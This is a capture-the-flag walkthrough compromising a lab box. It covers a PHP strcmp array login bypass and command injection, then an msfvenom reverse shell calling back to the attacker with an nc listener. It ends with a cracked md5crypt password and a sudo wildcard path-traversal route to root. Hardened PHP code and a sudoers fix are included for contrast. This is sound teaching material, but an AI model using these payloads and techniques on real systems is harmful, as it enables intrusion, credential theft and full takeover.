Alright, so, we’ve got another box to hack. Let’s scan it.
kali@kali:~/work$ nmap target -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 22:31 MDT
Nmap scan report for target (target)
Host is up (0.068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2112/tcp open kip
Nmap done: 1 IP address (1 host up) scanned in 72.96 seconds
Now, I don’t know what kip is, but I’m going to go ahead and press X to doubt.
kali@kali:~/work$ nmap target -p 2112 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 22:33 MDT
Nmap scan report for target (target)
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
2112/tcp open ftp ProFTPD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
That makes a lot more sense. Let’s see if we can log in.
kali@kali:~/work$ ftp target -p 2112
Connected to target.
220 ProFTPD Server (Debian) [::ffff:target]
Name (target:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@me !
230-
230-The local time is: Mon Oct 28 04:37:00 2024
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||63952|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||7250|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
901 8.67 MiB/s
226 Transfer complete
901 bytes received in 00:00 (13.20 KiB/s)
ftp>
We’re able to log in as anonymous and download index.php.bak… that will probably help later.
The contents of index.php.bak are as follows:
<html>
<head></head>
<body>
<?php
$pass= "password"; //note Change this password regularly
if($_GET['login']==="1"){
    if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
        echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
        setcookie('pass', $pass, time() + 365*24*3600);
    }else{
        echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
    }
    exit();
}
?>
<form action="index.php?login=1" method="POST">
    <h1>Login</h1>
    <label><b>User:</b></label>
    <input type="text" name="username" required>
    </br>
    <label><b>Password:</b></label>
    <input type="password" name="password" required>
    </br>
    <input type="submit" id='submit' value='Login' >
</form>
</body>
</html>
Let’s take a look at the HTTP service on port 80. There’s nothing interesting on the landing page, so let’s dir bust it.
kali@kali:~/work$ gobuster dir -u http://target -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 271]
/.htpasswd (Status: 403) [Size: 271]
/.htaccess (Status: 403) [Size: 271]
/admin (Status: 301) [Size: 300] [--> http://target/admin/]
/index.php (Status: 200) [Size: 245]
/server-status (Status: 403) [Size: 271]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Sweet, let’s look at /admin. And WOOP, it’s the login page generated by index.php.bak.
Unfortunately, ‘admin’ and ‘password’ didn’t work for auth, so after much research, we learn strcmp() returns 0 if both strings match. Great and obvious, but if you pass something that isn’t a string, such as an array, PHP 7’s strcmp() emits a warning and returns NULL instead of an integer (PHP 8 throws a TypeError instead), and the loose == 0 comparison treats NULL as equal to 0. Altering our login request to make password an array instead of a string, we’re able to log in!
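For contrast, here is how the login check in index.php.bak should have been written. This is an added example, not the box’s code; it assumes the admin password is stored as a password_hash() digest (the ADMIN_HASH constant is a placeholder) and that this block runs before any HTML output.

```php
<?php
// Added example (not the box's code): a hardened replacement for the login
// check in index.php.bak. Assumes the admin password is stored as a
// password_hash() digest loaded from outside the web root; the constant
// below is a placeholder. Generate a real one once with:
//   php -r 'echo password_hash("choose-a-strong-secret", PASSWORD_DEFAULT);'
declare(strict_types=1);

const ADMIN_USER = 'admin';
const ADMIN_HASH = '$2y$10$PLACEHOLDER-bcrypt-hash-replace-me';

/**
 * Returns true only when both inputs are real strings and match.
 * An array in either field (the strcmp() bypass) is rejected outright
 * instead of being juggled into strcmp() === NULL, which passes "== 0".
 */
function check_login($username, $password): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    // hash_equals() compares in constant time; password_verify() checks the
    // bcrypt digest, so the plaintext is never stored in the source.
    $userOk = hash_equals(ADMIN_USER, $username);
    $passOk = password_verify($password, ADMIN_HASH);
    // Evaluate both so the timing does not reveal which field was wrong.
    return $userOk && $passOk;
}

// Must run before any HTML is sent, because session_start() sets a cookie.
if (($_GET['login'] ?? '') === '1') {
    if (check_login($_POST['username'] ?? null, $_POST['password'] ?? null)) {
        session_start();
        session_regenerate_id(true);
        // A server-side session flag replaces the original setcookie('pass', ...),
        // which handed the plaintext admin password to the browser.
        $_SESSION['authenticated'] = true;
        echo 'Welcome! <br> Go to the <a href="dashboard.php">dashboard</a>';
    } else {
        echo '<p>Bad login/password! <br> Return to the <a href="index.php">login page</a></p>';
    }
    exit();
}
```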
Awesome! Now, let’s check out dashboard.php.
Alright, so this page has a number of functions. We can list users (it’s just us), we can look at log files (nothing interesting), and we can ping 8.8.8.8.
I wasn’t able to get command injection using ping, so I took a look at logs in Burp Suite.
And… command injection.
Editing the file parameter, we can simply add a semicolon, then whatever we want. Let’s pop a shell.
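The dashboard’s log viewer is not shown on the page, so as an added example (my code, not the box’s) here is a version of a "file" parameter handler that cannot be shell-injected: it assumes the original built a shell command from the parameter, and LOG_DIR and the allowlist are placeholders.

```php
<?php
// Added example (not the box's code): a log viewer for dashboard.php's "file"
// parameter that never touches a shell, so ";" followed by a command is inert.
// Assumes (a guess, the original handler is not shown) that the vulnerable
// version built a shell command from the parameter. LOG_DIR and the allowlist
// are placeholders for this example.
declare(strict_types=1);

const LOG_DIR = '/var/log/webapp';
const ALLOWED_LOGS = ['access.log', 'error.log'];

/**
 * Returns the contents of an allowlisted log, or null for anything else:
 * unknown names, arrays, "../" traversal, or "access.log;id" style input.
 */
function read_log($name): ?string
{
    // Exact-match allowlist: the only accepted values are the ones we chose.
    if (!is_string($name) || !in_array($name, ALLOWED_LOGS, true)) {
        return null;
    }
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . '/' . $name);
    // Belt and braces: even an allowlisted name must resolve inside LOG_DIR,
    // which catches a symlink dropped into the log directory.
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

$log = read_log($_GET['file'] ?? null);
if ($log === null) {
    http_response_code(400);
    echo 'Unknown log file';
} else {
    // Serve as plain text so log contents are not interpreted by the browser either.
    header('Content-Type: text/plain; charset=utf-8');
    echo $log;
}
```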
First, we create a reverse shell payload. We know the host is Linux, so x86_64 ELF it is.
kali@kali:~/work$ msfvenom -p linux/x64/shell_reverse_tcp -f elf -o rshell LHOST=me LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshell
Then we host it via HTTP.
kali@kali:~/work$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now, we trick the target into downloading our payload, making it executable, and running it. Don’t forget to start a listener.
And just like that, we’re in. Let’s poke around.
kali@kali:~/work$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [me] from (UNKNOWN) [target] 48286
uname -a
Linux serv 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
florianges:x:1000:1000:florianges:/home/florianges:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
OwO, what’s dis??? Webadmin stores their password hash right in the world-readable /etc/passwd instead of /etc/shadow, and the $1$ prefix means it’s md5crypt (hashcat mode 500). Let’s crack it!
kali@kali:~/work$ hashcat -m 500 webadmin.hash rockyou.txt
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:dragon
SSHing in as webadmin, we have access. Of course, we’re not through. We want root. One of the first things to check is what sudo access we have.
webadmin@serv:~$ sudo -l
[sudo] password for webadmin:
Matching Defaults entries for webadmin on serv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*
Alright, so we can run nice as root, and the asterisk is a misconfiguration issue: sudoers matches the argument with shell-style globbing, so /notes/* also matches a path like /notes/../usr/bin/bash, and nice just executes whatever path it is handed. The fix is to name the exact command and arguments in sudoers rather than using a wildcard.
webadmin@serv:~$ sudo /bin/nice /notes/../usr/bin/bash
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)
And like that, we’re root.